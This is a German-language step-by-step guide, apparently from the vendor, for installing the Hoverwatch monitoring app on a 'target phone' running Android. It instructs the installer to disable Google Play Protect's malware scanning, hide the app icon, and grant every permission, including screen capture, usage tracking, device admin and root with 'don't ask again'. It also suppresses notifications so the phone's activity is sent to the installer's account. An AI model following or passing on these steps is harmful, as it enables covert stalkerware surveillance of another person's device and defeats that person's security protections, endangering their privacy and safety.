Wie installiert man Hoverwatch auf Android

Videoanleitung:

Textanleitung:

1. Bereiten Sie Ihr Ziel-Handy vor

Um zu verhindern, dass Android Fragen über die Aktivität des Überwachungsprogramms stellt:

Sie die Anwendung "Play Store" tippen Sie auf -> Menü -> wählen Sie "Play Protect" -> tippen Sie auf das Symbol Einstellungen / Settings .
Deaktivieren Sie "Gerät auf Sicherheitsbedrohungen scannen / Scan device for security threats" und "Erkennung schädlicher Anwendungen verbessern".

2. Laden Sie die App herunter

Öffnen Sie Ihren Browser. Schalten Sie den "Geheimmodus / Secret mode", ein, wenn Sie möchten. Geben Sie hoverwatch.com ein. Geben Sie Ihre E-Mail Adresse und Ihr Passwort ein (erstellen Sie ein Hoverwatch-Konto) und klicken Sie auf "KOSTENLOS ANMELDEN / SIGN UP FREE".

Wählen Sie Android und klicken Sie auf den Download-Link.

Tippen Sie auf "Download".

Tippen Sie auf "Datei öffnen / Open file".

Wenn Sie die Seite "Gerät hinzufügen / Add Device" nicht finden können, klicken Sie auf die Schaltfläche "Menü" und dann auf "Gerät hinzufügen/ Add Device".

3. Installieren Sie die App

Tippen Sie auf "Einstellungen / Settings" und erlauben Sie es, die App zu installieren.

Tippen Sie auf "Zurück / Back". Tippen Sie auf Installieren / Install.

Wenn die Schaltfläche "Öffnen" nicht aktiv ist, folgen Sie den Anweisungen.

Wählen Sie die Option Installation und tippen Sie auf OK.

Je nachdem, was Sie wählen, können Sie das Hoverwatch Symbol verbergen.

Akzeptieren Sie die gesetzlichen Bestimmungen.

Geben Sie Ihren Benutzernamen und Ihr Passwort für Ihr Hoverwatch-Konto ein. Tippen Sie auf Aktivieren / Activate.

Aktivieren Sie alle App-Berechtigungen:

Tippen Sie auf "JA / YES" und dann auf "Zulassen / Allow" , um alle Berechtigungen zu aktivieren.

Deaktivieren Sie die Akku-Optimierung:

Tippen Sie auf "Ja / Yes" Tippen Sie auf "Zulassen / Allow".

Aktivieren Sie die Berechtigung "Über anderen Apps einblenden / Appear on top":

Tippen Sie auf "Ja / Yes" aktivieren Sie "Berechtigung erteilen / Allow permission". Tippen Sie auf "Zurück / Back".

Erlauben Sie es der App, den Bildschirm zu erfassen:

Tippen Sie auf "JA / YES".

Aktivieren Sie den Punkt "Nicht mehr anzeigen / Don`t show again". Tippen Sie auf die Schaltfläche "Jetzt starten / Start now".

Aktivieren Sie "Nutzungsverfolgung / Usage tracking":

Tippen Sie auf "Ja / Yes", suchen und tippen Sie auf "Sync Service", aktivieren Sie "Nutzungsüberwachung zulassen / Allow usage tracking".

002.jpg 003.jpg

Tippen Sie zweimal auf die Schaltfläche "Zurück / back" und kehren Sie zur Hoverwatch App zurück.

App-Benachrichtigungen / app notifications deaktivieren:

Tippen Sie auf "Ja / Yes". Tippen Sie auf "Benachrichtigungen anzeigen / Show notifications".

5.1.jpg 5.2.jpg

Tippen Sie auf "Zurück / back" und kehren Sie zur Hoverwatch-App zurück.

Geräteadministrator / Device admin aktivieren:

Tippen Sie "Ja / Yes" Tippen Sie in einer neuen Nachricht auf "Aktivieren / Activate".

4. Prüfen Sie weitere Einstellungen

Wenn Ihr Handy nicht gerootet ist, sind Sie bereit.

Wenn Ihr Handy gerootet ist, stellt Ihnen das Programm während der Installation noch ein paar weitere Fragen.

Wenn Sie gefragt werden, ob Sie einen Neustart durchführen möchten, antworten Sie mit "Ja / Yes".

Achten Sie bei "Achten Sie bei / Root Permission Request" darauf, dass Sie das Kontrollkästchen "Nicht noch einmal fragen / Don't ask again", aktivieren und klicken Sie dann auf "Autorisieren / Authorize".

Bitte überprüfen Sie, ob Ihr Gerät korrekt gerootet ist, indem Sie einen gratis Root Checker aus dem Google Play Store verwenden.

Das Programm beginnt nach dem Neustart des Computers zu arbeiten.

In 5-6 Minuten erscheinen Informationen vom Gerät in Ihrem Hoverwatch-Konto.

show up